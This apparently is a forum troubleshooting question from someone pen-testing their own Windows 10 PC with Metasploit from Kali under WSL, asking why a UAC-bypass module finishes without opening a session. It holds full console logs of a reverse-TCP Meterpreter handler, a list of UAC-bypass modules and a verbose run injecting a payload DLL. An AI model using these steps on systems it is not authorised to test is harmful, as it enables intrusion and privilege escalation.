I am trying to do a penetration test on my PC using WSL and Kali. Everything worked fine up to the point where I created and executed the payload on my target PC and got a session back.
- After completing the first step, I got:

```
msf6 > use multi/handler
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 10.9.88.222
lhost => 10.9.88.222
msf6 exploit(multi/handler) > set lport 8080
lport => 8080
msf6 exploit(multi/handler) > start
[-] Unknown command: start.
msf6 exploit(multi/handler) > exploit
[*] Started reverse TCP handler on 10.9.88.222:8080
[*] Sending stage (175174 bytes) to 10.9.0.1
[*] Meterpreter session 1 opened (10.9.88.222:8080 -> 10.9.0.1:54501) at 2021-01-07 13:08:04 +0530
meterpreter >
```
- However, the main problem comes here: I am trying to bypass UAC and get system-level privileges. I tried 4 - 6 of the modules listed by `search uac`; after running `search uac` I got:

```
meterpreter > background
[*] Backgrounding session 1...
msf6 exploit(multi/handler) > search uac

Matching Modules
================

   #   Name                                                   Disclosure Date  Rank       Check  Description
   -   ----                                                   ---------------  ----       -----  -----------
   0   exploit/windows/local/ask                              2012-01-03       excellent  No     Windows Escalate UAC Execute RunAs
   1   exploit/windows/local/bypassuac                        2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass
   2   exploit/windows/local/bypassuac_comhijack              1900-01-01       excellent  Yes    Windows Escalate UAC Protection Bypass (Via COM Handler Hijack)
   3   exploit/windows/local/bypassuac_dotnet_profiler        2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via dot net profiler)
   4   exploit/windows/local/bypassuac_eventvwr               2016-08-15       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Eventvwr Registry Key)
   5   exploit/windows/local/bypassuac_fodhelper              2017-05-12       excellent  Yes    Windows UAC Protection Bypass (Via FodHelper Registry Key)
   6   exploit/windows/local/bypassuac_injection              2010-12-31       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection)
   7   exploit/windows/local/bypassuac_injection_winsxs       2017-04-06       excellent  No     Windows Escalate UAC Protection Bypass (In Memory Injection) abusing WinSXS
   8   exploit/windows/local/bypassuac_sdclt                  2017-03-17       excellent  Yes    Windows Escalate UAC Protection Bypass (Via Shell Open Registry Key)
   9   exploit/windows/local/bypassuac_silentcleanup          2019-02-24       excellent  No     Windows Escalate UAC Protection Bypass (Via SilentCleanup)
   10  exploit/windows/local/bypassuac_sluihijack             2018-01-15       excellent  Yes    Windows UAC Protection Bypass (Via Slui File Handler Hijack)
   11  exploit/windows/local/bypassuac_vbs                    2015-08-22       excellent  No     Windows Escalate UAC Protection Bypass (ScriptHost Vulnerability)
   12  exploit/windows/local/bypassuac_windows_store_filesys  2019-08-22       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe)
   13  exploit/windows/local/bypassuac_windows_store_reg      2019-02-19       manual     Yes    Windows 10 UAC Protection Bypass Via Windows Store (WSReset.exe) and Registry
   14  post/windows/gather/win_privs                                           normal     No     Windows Gather Privileges Enumeration
   15  post/windows/manage/sticky_keys                                         normal     No     Sticky Keys Persistance Module

Interact with a module by name or index. For example info 15, use 15 or use post/windows/manage/sticky_keys
```
I tried module 7 and got:

```
msf6 exploit(multi/handler) > use 7
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection_winsxs) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Windows x86
   1   Windows x64

msf6 exploit(windows/local/bypassuac_injection_winsxs) > set target 1
target => 1
msf6 exploit(windows/local/bypassuac_injection_winsxs) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_injection_winsxs) > set session 1
session => 1
msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LHOST 10.9.88.222
LHOST => 10.9.88.222
msf6 exploit(windows/local/bypassuac_injection_winsxs) > set LPORT 8080
LPORT => 8080
msf6 exploit(windows/local/bypassuac_injection_winsxs) > run

[*] Started reverse TCP handler on 10.9.88.222:8080
[+] Windows 10 (10.0 Build 18363). may be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[+] Successfully injected payload in to process: 9248
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_injection_winsxs) >
```
- Everything goes fine, but no session is created; I get:

```
exploit completed but no session was created
```

- When I run it in verbose mode, I get this:

```
[*] Started reverse TCP handler on 10.9.88.222:8080
[+] Windows 10 (10.0 Build 18363). may be vulnerable.
[*] UAC is Enabled, checking level...
[*] Checking admin status...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Creating temporary folders...
[*] Uploading the Payload DLL to the filesystem...
[*] Payload DLL 8704 bytes long being uploaded...
[*] Spawning process with Windows Publisher Certificate, to inject into...
[*] Injecting into process ID 10880
[*] Opening process 10880
[*] Injecting struct into 10880
[*] Executing payload
[+] Successfully injected payload in to process: 10880
[*] Exploit completed, but no session was created.
```
- I have used Portmap.io port forwarding (free plan), and I have the latest versions of the Metasploit Framework, WSL 2 and the Kali Linux app installed.
How can I fix this?